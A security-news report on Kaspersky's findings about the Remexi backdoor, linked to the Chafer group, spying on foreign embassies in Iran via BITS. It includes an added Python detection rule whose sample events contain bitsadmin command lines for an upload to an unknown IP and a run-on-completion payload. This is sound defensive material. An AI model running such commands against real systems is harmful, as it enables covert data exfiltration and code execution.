Remexi Trojan linked to Chafer cyber-espionage gang in attacks targeting foreign embassies
Security researchers from Kaspersky Lab recently found several attempts by alleged cyber-criminals to infect foreign embassies inside Iran by installing homebrew spyware on their systems. A revised Remexi backdoor was apparently used in the attacks, alongside a number of legitimate tools.
Kaspersky describes Remexi as a Trojan that creates a backdoor enabling remote access to the infected system. There appears to be an association between Remexi and Chafer, a presumed Farsi-speaking cyber-espionage gang that was earlier tied to surveillance of individuals in the Middle East. The revised Remexi Trojan is detected as Trojan.Win32.Agent and Trojan.Win32.Remexi. According to Kaspersky, the gang's targeting of embassies may indicate that it is taking on a new focus.
Denis Legezo of Kaspersky says Remexi can exfiltrate web-browser data such as history and cookies, as well as screenshots and keystrokes, decrypted where feasible. The attackers rely heavily on Microsoft technologies on both the server and the client side; for instance, the malware uses standard Windows utilities such as Microsoft BITS (Background Intelligent Transfer Service), via bitsadmin.exe, to receive instructions and then exfiltrate data, Legezo explains. www.theregister.co.uk posted this on January 31, 2019.
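Because the malware drives BITS through the stock bitsadmin.exe utility, process-creation telemetry is a natural place for defenders to look. The following is an added detection example, not code from the article or from Kaspersky: it runs a simple rule over a few constructed Sysmon-style process-creation events and flags bitsadmin.exe invocations that configure a completion command, create an upload job, or transfer to a host outside an allow-list. The event format, host names, paths and the allow-list are assumptions for this example; only the bitsadmin switches are real ones.

```python
import re
import shlex
from dataclasses import dataclass
from urllib.parse import urlparse

# Constructed sample process-creation events in a flattened Sysmon Event ID 1
# style ("key=value" fields joined by "|"). Paths, hosts and file names are
# invented for this example; only the bitsadmin.exe switches are real ones.
SAMPLE_EVENTS = [
    # 1: routine download from an allow-listed internal update server
    "Image=C:\\Windows\\System32\\bitsadmin.exe|ParentImage=C:\\Windows\\System32\\cmd.exe|"
    "CommandLine=bitsadmin /transfer upd /download /priority normal "
    "http://updates.corp.example/agent.msi C:\\Temp\\agent.msi",
    # 2: upload job to an unknown host, the shape an exfiltration over BITS takes
    "Image=C:\\Windows\\System32\\bitsadmin.exe|ParentImage=C:\\Users\\Public\\svc.exe|"
    "CommandLine=bitsadmin /transfer rpt /upload http://203.0.113.10/u/rpt.bin "
    "C:\\Users\\Public\\Libraries\\rpt.bin",
    # 3: job that runs a program when the transfer completes
    "Image=C:\\Windows\\System32\\bitsadmin.exe|ParentImage=C:\\Users\\Public\\svc.exe|"
    "CommandLine=bitsadmin /SetNotifyCmdLine job1 C:\\Users\\Public\\Libraries\\t.exe NULL",
    # 4: unrelated process, must not be flagged
    "Image=C:\\Windows\\System32\\notepad.exe|ParentImage=C:\\Windows\\explorer.exe|"
    "CommandLine=notepad.exe C:\\Users\\alice\\notes.txt",
]

# Constructed allow-list of hosts BITS may legitimately talk to in this environment.
ALLOWED_HOSTS = {"updates.corp.example"}

URL_RE = re.compile(r"^https?://", re.IGNORECASE)


@dataclass
class Finding:
    severity: str
    reason: str
    command_line: str


def parse_event(line):
    """Split a flattened 'k=v|k=v' event into a dict of fields."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key] = value
    return fields


def analyze_bitsadmin(fields):
    """Return a Finding if the event is a bitsadmin.exe invocation worth triage."""
    if not fields.get("Image", "").lower().endswith("\\bitsadmin.exe"):
        return None
    cmd = fields.get("CommandLine", "")
    # posix=False keeps Windows backslashes intact while still honouring quotes
    tokens = shlex.split(cmd, posix=False)
    switches = {t.lower() for t in tokens if t.startswith("/")}
    hosts = {urlparse(t).hostname for t in tokens if URL_RE.match(t)}
    hosts.discard(None)

    # Strongest signals first: a completion command, then an outbound upload.
    if "/setnotifycmdline" in switches:
        return Finding("high", "BITS job configured to run a program on completion", cmd)
    if "/upload" in switches:
        return Finding("high", "BITS upload job (data leaving the host): " + ", ".join(sorted(hosts)), cmd)
    # Any transfer to a host outside the allow-list is worth a look.
    unknown = sorted(h for h in hosts if h not in ALLOWED_HOSTS)
    if unknown and switches & {"/transfer", "/addfile", "/create", "/resume"}:
        return Finding("medium", "BITS transfer with non-allow-listed host: " + ", ".join(unknown), cmd)
    return None


def scan(events):
    """Run the rule over a list of flattened events and collect the findings."""
    findings = []
    for line in events:
        finding = analyze_bitsadmin(parse_event(line))
        if finding:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f.severity.upper(), "-", f.reason)
```

Run against the constructed events, the rule reports the upload job and the completion-command job and stays silent on the allow-listed download and the unrelated process. In a real deployment the allow-list would be built from observed legitimate BITS endpoints, and the parent-process field already present in the events is a useful second dimension (bitsadmin.exe launched from an unusual user-writable path deserves a higher score).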
Remexi was reportedly first detected in 2015. The Trojan used in the latest campaign shares code with earlier known samples, and also overlaps with them in the victims targeted, indicating a connection with Chafer. The most recent sample can execute commands remotely and capture browser data, screenshots and typed text.
The malware's exact objective is unknown; however, Kaspersky researchers believe the Remexi infections relate to a domestic espionage scheme aimed at monitoring the activity of foreign diplomats in the Middle East. Aside from the targeting of foreign embassies, Kaspersky found evidence such as encryption keys written in Farsi, indicating that Iranian operatives could be behind the campaign.
Iran in particular has been conducting a good deal of online espionage lately. While the country's government uses its malware for surveillance and espionage, its groups concentrate heavily on social-media schemes that seek to advance the country's political interests.
» SPAMfighter News - 2/6/2019